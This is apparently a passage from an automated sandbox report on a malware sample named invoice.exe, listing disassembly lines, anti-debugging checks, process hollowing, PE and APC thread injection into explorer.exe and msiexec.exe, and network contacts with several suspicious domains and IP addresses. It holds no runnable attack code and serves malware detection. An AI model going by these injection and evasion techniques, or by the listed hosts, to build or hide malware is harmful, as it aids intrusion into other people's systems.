Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01036C0A mov eax, dword ptr fs:[00000030h]	1_2_01036C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01036C0A mov eax, dword ptr fs:[00000030h]	1_2_01036C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01036C0A mov eax, dword ptr fs:[00000030h]	1_2_01036C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01036C0A mov eax, dword ptr fs:[00000030h]	1_2_01036C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FCD5E0 mov eax, dword ptr fs:[00000030h]	1_2_00FCD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FCD5E0 mov eax, dword ptr fs:[00000030h]	1_2_00FCD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FE1DB5 mov eax, dword ptr fs:[00000030h]	1_2_00FE1DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FE1DB5 mov eax, dword ptr fs:[00000030h]	1_2_00FE1DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FE1DB5 mov eax, dword ptr fs:[00000030h]	1_2_00FE1DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0104C450 mov eax, dword ptr fs:[00000030h]	1_2_0104C450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0104C450 mov eax, dword ptr fs:[00000030h]	1_2_0104C450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FE35A1 mov eax, dword ptr fs:[00000030h]	1_2_00FE35A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FEFD9B mov eax, dword ptr fs:[00000030h]	1_2_00FEFD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FEFD9B mov eax, dword ptr fs:[00000030h]	1_2_00FEFD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FB2D8A mov eax, dword ptr fs:[00000030h]	1_2_00FB2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FB2D8A mov eax, dword ptr fs:[00000030h]	1_2_00FB2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FB2D8A mov eax, dword ptr fs:[00000030h]	1_2_00FB2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FB2D8A mov eax, dword ptr fs:[00000030h]	1_2_00FB2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FB2D8A mov eax, dword ptr fs:[00000030h]	1_2_00FB2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FE2581 mov eax, dword ptr fs:[00000030h]	1_2_00FE2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FE2581 mov eax, dword ptr fs:[00000030h]	1_2_00FE2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FE2581 mov eax, dword ptr fs:[00000030h]	1_2_00FE2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FE2581 mov eax, dword ptr fs:[00000030h]	1_2_00FE2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDC577 mov eax, dword ptr fs:[00000030h]	1_2_00FDC577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDC577 mov eax, dword ptr fs:[00000030h]	1_2_00FDC577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FD8D76 mov eax, dword ptr fs:[00000030h]	1_2_00FD8D76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FD8D76 mov eax, dword ptr fs:[00000030h]	1_2_00FD8D76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FD8D76 mov eax, dword ptr fs:[00000030h]	1_2_00FD8D76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FD8D76 mov eax, dword ptr fs:[00000030h]	1_2_00FD8D76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FD8D76 mov eax, dword ptr fs:[00000030h]	1_2_00FD8D76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01074496 mov eax, dword ptr fs:[00000030h]	1_2_01074496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01074496 mov eax, dword ptr fs:[00000030h]	1_2_01074496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01074496 mov eax, dword ptr fs:[00000030h]	1_2_01074496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01074496 mov eax, dword ptr fs:[00000030h]	1_2_01074496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01074496 mov eax, dword ptr fs:[00000030h]	1_2_01074496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01074496 mov eax, dword ptr fs:[00000030h]	1_2_01074496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01074496 mov eax, dword ptr fs:[00000030h]	1_2_01074496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01074496 mov eax, dword ptr fs:[00000030h]	1_2_01074496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01074496 mov eax, dword ptr fs:[00000030h]	1_2_01074496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01074496 mov eax, dword ptr fs:[00000030h]	1_2_01074496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01074496 mov eax, dword ptr fs:[00000030h]	1_2_01074496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01074496 mov eax, dword ptr fs:[00000030h]	1_2_01074496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01074496 mov eax, dword ptr fs:[00000030h]	1_2_01074496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FD7D50 mov eax, dword ptr fs:[00000030h]	1_2_00FD7D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FF3D43 mov eax, dword ptr fs:[00000030h]	1_2_00FF3D43
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FE4D3B mov eax, dword ptr fs:[00000030h]	1_2_00FE4D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FE4D3B mov eax, dword ptr fs:[00000030h]	1_2_00FE4D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FE4D3B mov eax, dword ptr fs:[00000030h]	1_2_00FE4D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FC3D34 mov eax, dword ptr fs:[00000030h]	1_2_00FC3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FC3D34 mov eax, dword ptr fs:[00000030h]	1_2_00FC3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FC3D34 mov eax, dword ptr fs:[00000030h]	1_2_00FC3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FC3D34 mov eax, dword ptr fs:[00000030h]	1_2_00FC3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FC3D34 mov eax, dword ptr fs:[00000030h]	1_2_00FC3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FC3D34 mov eax, dword ptr fs:[00000030h]	1_2_00FC3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FC3D34 mov eax, dword ptr fs:[00000030h]	1_2_00FC3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FC3D34 mov eax, dword ptr fs:[00000030h]	1_2_00FC3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FC3D34 mov eax, dword ptr fs:[00000030h]	1_2_00FC3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FC3D34 mov eax, dword ptr fs:[00000030h]	1_2_00FC3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FC3D34 mov eax, dword ptr fs:[00000030h]	1_2_00FC3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FC3D34 mov eax, dword ptr fs:[00000030h]	1_2_00FC3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FC3D34 mov eax, dword ptr fs:[00000030h]	1_2_00FC3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FBAD30 mov eax, dword ptr fs:[00000030h]	1_2_00FBAD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FEF527 mov eax, dword ptr fs:[00000030h]	1_2_00FEF527
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FEF527 mov eax, dword ptr fs:[00000030h]	1_2_00FEF527
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FEF527 mov eax, dword ptr fs:[00000030h]	1_2_00FEF527
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01088CD6 mov eax, dword ptr fs:[00000030h]	1_2_01088CD6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01036CF0 mov eax, dword ptr fs:[00000030h]	1_2_01036CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01036CF0 mov eax, dword ptr fs:[00000030h]	1_2_01036CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01036CF0 mov eax, dword ptr fs:[00000030h]	1_2_01036CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_010714FB mov eax, dword ptr fs:[00000030h]	1_2_010714FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0108070D mov eax, dword ptr fs:[00000030h]	1_2_0108070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0108070D mov eax, dword ptr fs:[00000030h]	1_2_0108070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0104FF10 mov eax, dword ptr fs:[00000030h]	1_2_0104FF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0104FF10 mov eax, dword ptr fs:[00000030h]	1_2_0104FF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FE16E0 mov ecx, dword ptr fs:[00000030h]	1_2_00FE16E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FC76E2 mov eax, dword ptr fs:[00000030h]	1_2_00FC76E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FE36CC mov eax, dword ptr fs:[00000030h]	1_2_00FE36CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FF8EC7 mov eax, dword ptr fs:[00000030h]	1_2_00FF8EC7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01071751 mov eax, dword ptr fs:[00000030h]	1_2_01071751
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01088F6A mov eax, dword ptr fs:[00000030h]	1_2_01088F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDAE73 mov eax, dword ptr fs:[00000030h]	1_2_00FDAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDAE73 mov eax, dword ptr fs:[00000030h]	1_2_00FDAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDAE73 mov eax, dword ptr fs:[00000030h]	1_2_00FDAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDAE73 mov eax, dword ptr fs:[00000030h]	1_2_00FDAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDAE73 mov eax, dword ptr fs:[00000030h]	1_2_00FDAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FC766D mov eax, dword ptr fs:[00000030h]	1_2_00FC766D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01037794 mov eax, dword ptr fs:[00000030h]	1_2_01037794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01037794 mov eax, dword ptr fs:[00000030h]	1_2_01037794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01037794 mov eax, dword ptr fs:[00000030h]	1_2_01037794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FC7E41 mov eax, dword ptr fs:[00000030h]	1_2_00FC7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FC7E41 mov eax, dword ptr fs:[00000030h]	1_2_00FC7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FC7E41 mov eax, dword ptr fs:[00000030h]	1_2_00FC7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FC7E41 mov eax, dword ptr fs:[00000030h]	1_2_00FC7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FC7E41 mov eax, dword ptr fs:[00000030h]	1_2_00FC7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FC7E41 mov eax, dword ptr fs:[00000030h]	1_2_00FC7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_010717D2 mov eax, dword ptr fs:[00000030h]	1_2_010717D2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FBE620 mov eax, dword ptr fs:[00000030h]	1_2_00FBE620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FEA61C mov eax, dword ptr fs:[00000030h]	1_2_00FEA61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FEA61C mov eax, dword ptr fs:[00000030h]	1_2_00FEA61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FBC600 mov eax, dword ptr fs:[00000030h]	1_2_00FBC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FBC600 mov eax, dword ptr fs:[00000030h]	1_2_00FBC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FBC600 mov eax, dword ptr fs:[00000030h]	1_2_00FBC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FD5600 mov eax, dword ptr fs:[00000030h]	1_2_00FD5600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FD5600 mov eax, dword ptr fs:[00000030h]	1_2_00FD5600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FD5600 mov eax, dword ptr fs:[00000030h]	1_2_00FD5600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FD5600 mov eax, dword ptr fs:[00000030h]	1_2_00FD5600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FD5600 mov ecx, dword ptr fs:[00000030h]	1_2_00FD5600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FD5600 mov ecx, dword ptr fs:[00000030h]	1_2_00FD5600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FD5600 mov eax, dword ptr fs:[00000030h]	1_2_00FD5600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FD5600 mov ecx, dword ptr fs:[00000030h]	1_2_00FD5600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FD5600 mov ecx, dword ptr fs:[00000030h]	1_2_00FD5600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FD5600 mov eax, dword ptr fs:[00000030h]	1_2_00FD5600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FD5600 mov eax, dword ptr fs:[00000030h]	1_2_00FD5600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FD5600 mov eax, dword ptr fs:[00000030h]	1_2_00FD5600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FD5600 mov eax, dword ptr fs:[00000030h]	1_2_00FD5600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FD5600 mov eax, dword ptr fs:[00000030h]	1_2_00FD5600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FD5600 mov eax, dword ptr fs:[00000030h]	1_2_00FD5600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FD5600 mov eax, dword ptr fs:[00000030h]	1_2_00FD5600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FD5600 mov eax, dword ptr fs:[00000030h]	1_2_00FD5600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FD5600 mov eax, dword ptr fs:[00000030h]	1_2_00FD5600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FD5600 mov eax, dword ptr fs:[00000030h]	1_2_00FD5600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FE8E00 mov eax, dword ptr fs:[00000030h]	1_2_00FE8E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FF37F5 mov eax, dword ptr fs:[00000030h]	1_2_00FF37F5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01071608 mov eax, dword ptr fs:[00000030h]	1_2_01071608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0106FE3F mov eax, dword ptr fs:[00000030h]	1_2_0106FE3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0107AE44 mov eax, dword ptr fs:[00000030h]	1_2_0107AE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0107AE44 mov eax, dword ptr fs:[00000030h]	1_2_0107AE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FC8794 mov eax, dword ptr fs:[00000030h]	1_2_00FC8794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0104FE87 mov eax, dword ptr fs:[00000030h]	1_2_0104FE87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FCFF60 mov eax, dword ptr fs:[00000030h]	1_2_00FCFF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_010346A7 mov eax, dword ptr fs:[00000030h]	1_2_010346A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01080EA5 mov eax, dword ptr fs:[00000030h]	1_2_01080EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01080EA5 mov eax, dword ptr fs:[00000030h]	1_2_01080EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01080EA5 mov eax, dword ptr fs:[00000030h]	1_2_01080EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FCEF40 mov eax, dword ptr fs:[00000030h]	1_2_00FCEF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDB73D mov eax, dword ptr fs:[00000030h]	1_2_00FDB73D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDB73D mov eax, dword ptr fs:[00000030h]	1_2_00FDB73D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_0106FEC0 mov eax, dword ptr fs:[00000030h]	1_2_0106FEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FE3F33 mov eax, dword ptr fs:[00000030h]	1_2_00FE3F33
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FEE730 mov eax, dword ptr fs:[00000030h]	1_2_00FEE730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FB4F2E mov eax, dword ptr fs:[00000030h]	1_2_00FB4F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FB4F2E mov eax, dword ptr fs:[00000030h]	1_2_00FB4F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01088ED6 mov eax, dword ptr fs:[00000030h]	1_2_01088ED6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FDF716 mov eax, dword ptr fs:[00000030h]	1_2_00FDF716
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FE4710 mov eax, dword ptr fs:[00000030h]	1_2_00FE4710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FEA70E mov eax, dword ptr fs:[00000030h]	1_2_00FEA70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_00FEA70E mov eax, dword ptr fs:[00000030h]	1_2_00FEA70E

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 1_2_00FF98F0 NtReadVirtualMemory,LdrInitializeThunk,

1_2_00FF98F0

Source: C:\Users\user\Desktop\invoice.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 35.241.57.73 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.53kzl.xyz
Source: C:\Windows\explorer.exe	Network Connect: 64.190.62.22 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.soft-r.pro
Source: C:\Windows\explorer.exe	Domain query: www.bunniesfor-sales.site
Source: C:\Windows\explorer.exe	Network Connect: 194.58.112.174 80	Jump to behavior

Sample uses process hollowing technique

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Section unmapped: C:\Windows\SysWOW64\msiexec.exe base address: B00000

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\invoice.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 64C008	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\invoice.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread register set: target process: 3452			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread register set: target process: 3452			Jump to behavior

Source: C:\Users\user\Desktop\invoice.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe {path}

Jump to behavior

Source: explorer.exe, 00000002.00000000.280599446.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.353491387.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.331805855.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program ManagerT7<=ge
Source: explorer.exe, 00000002.00000000.365088513.00000000090D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.336321125.0000000006770000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.280599446.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.280599446.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.353491387.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.331805855.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.279566741.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.330718392.0000000001378000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CProgmanile
